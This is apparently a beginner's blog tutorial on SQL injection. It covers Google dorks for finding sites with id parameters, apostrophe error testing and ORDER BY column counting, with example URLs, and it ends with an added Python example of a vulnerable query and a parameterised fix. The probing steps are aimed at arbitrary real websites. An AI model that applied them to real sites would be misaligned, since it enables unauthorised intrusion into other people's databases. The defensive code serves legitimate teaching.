Hey guys, this is Webtrix again to help you with an interesting topic! You know what SQL injection is? Today we're going to talk about that very big job!
SQL injection is an attack in which malicious code is put into strings which are later passed to an instance of SQL Server to be executed! But which sites are SQL vulnerable, and how do you find them?
Don't worry! Webtrix is here to assist you. Let's find them out!
How to find sites on which we can perform:
While going to find a vulnerable site to inject SQL you'll hear the words "Dork a lot". This means to google a particular term which targets finding vulnerable websites. An example of a Google dork is
inurl:index.php?id=
Entering this string in the Google search engine would find all sites from the Google cache with the string news.php?id= in their URL. Viz:
http://www.site.com/news.php?id=4
To be SQL injection vulnerable, a site has to have a GET parameter in the URL. In http://www.site.com/news.php?id=4, id=4 is the GET parameter, as it is getting the id=4 from the back-end database.
How to check vulnerability with that:
To test whether the site is vulnerable to SQLi or not, we just have to add an apostrophe ( ' ) after one of the parameters in the URL.
Viz. http://www.site.com/news.php?id=4'
If the site is vulnerable it will show an error like:
You have an error in your SQL Syntax
Warning: mysql_num_rows()
Warning: mysql_fetch_assoc()
Warning: mysql_result()
Warning: mysql_fetch_array()
Warning: mysql_numrows()
Warning: mysql_preg_match()
If you notice any of the mentioned errors after putting ' after the parameter in that URL, then there's a possibility that the site is at least a little vulnerable to SQLi attacks. But it's not the only method to discover whether the site is vulnerable or not; vulnerability can also show up as an error in the form of vanishing, where a part of the site simply disappears.
How to find the number of columns:
When you come to know that the site is vulnerable, the next step is to find the number of columns in the table which is in use. There are a lot of ways to find this, like ORDER BY or GROUP BY. Here we use ORDER BY to find the number of columns. Start with ORDER BY 1. Viz.
http://www.site.com/news.php?id=4 ORDER BY 1--
If it doesn't result in an error, then keep using the ORDER BY command. Sometimes you will get an error on doing ORDER BY 1; if it gives an error, then simply move on to another site. If it doesn't error, then always go to ORDER BY 10000 (because a table can't have 10000 columns in it) to see if it gives an error. Viz.
http://www.site.com/news.php?id=4 ORDER BY 10000--
Sometimes it doesn't error as it should; then use AND 1=0 before the ORDER BY query to make an error come out. Viz.
http://www.site.com/news.php?id=4 AND 1=0 ORDER BY 10000--
After getting the error on 10000 it's up to you how you find the number of columns. I begin with 100 and divide the number of columns by 2 until I get closer.
Viz:
http://www.site.com/news.php?id=4 ORDER BY 100--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 50--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 25--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 12--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 6--
ERROR
http://www.site.com/news.php?id=4 ORDER BY 3--
NO ERROR
As 6 is giving an error and 3 is not, the number of columns is either 3, 4 or 5.
http://www.site.com/news.php?id=4 ORDER BY 4--
NO ERROR
http://www.site.com/news.php?id=4 ORDER BY 5--
ERROR
After this you can come to the decision that the site has 4 columns, as it gives an error above ORDER BY 4 and doesn't error at ORDER BY 4 or below.
[NOTE: Comments are not necessary every time when injecting a site, though sometimes they are. Possible comments to use are:
--
/*
/**/
#
]
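Why the apostrophe and ORDER BY requests above produce errors, and what removes them, seen from the side of the person maintaining news.php. This is an added example, not code from the original post: it uses Python's sqlite3 in place of PHP/MySQL, and the table, column and function names are assumptions.

```python
import sqlite3

# Constructed sample data: a 4-column "news" table, matching the count found above.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO news VALUES (4, 'Launch day', 'Body text', 'editor')")
    return db

def fetch_vulnerable(db, id_param):
    # The bug: the raw GET value becomes part of the SQL text, so the database
    # parses whatever the client sent as SQL.
    return db.execute("SELECT * FROM news WHERE id = " + id_param).fetchall()

def fetch_hardened(db, id_param):
    # Fix 1: validate the type; an article id must be a plain integer.
    if not id_param.isdecimal():
        return None  # caller answers with a generic 404, not a database error
    # Fix 2: bind the value as a parameter so it is never parsed as SQL.
    return db.execute("SELECT * FROM news WHERE id = ?", (int(id_param),)).fetchall()

def probe(fetch, db, id_param):
    # Report what the page would reveal: rows, a raw SQL error, or a rejection.
    try:
        rows = fetch(db, id_param)
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)  # what a verbose error page leaks
    return "rejected" if rows is None else "%d row(s)" % len(rows)

if __name__ == "__main__":
    db = make_db()
    for value in ["4", "4'", "4 ORDER BY 4", "4 ORDER BY 5"]:
        print(repr(value), "| vulnerable:", probe(fetch_vulnerable, db, value),
              "| hardened:", probe(fetch_hardened, db, value))
```

With the hardened version every value except a plain number gets the same answer, so the page no longer tells the visitor anything about the query or the table behind it.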
The next part on "SQL injection based on URL" will be published in the next post. Please be patient. :)
[NOTE: This tutorial is only for educational purposes. Webtrix neither guarantees any trick nor is responsible for the outcomes of any trick performed by anyone. Remember, SQL injection is a punishable cyber offence.
]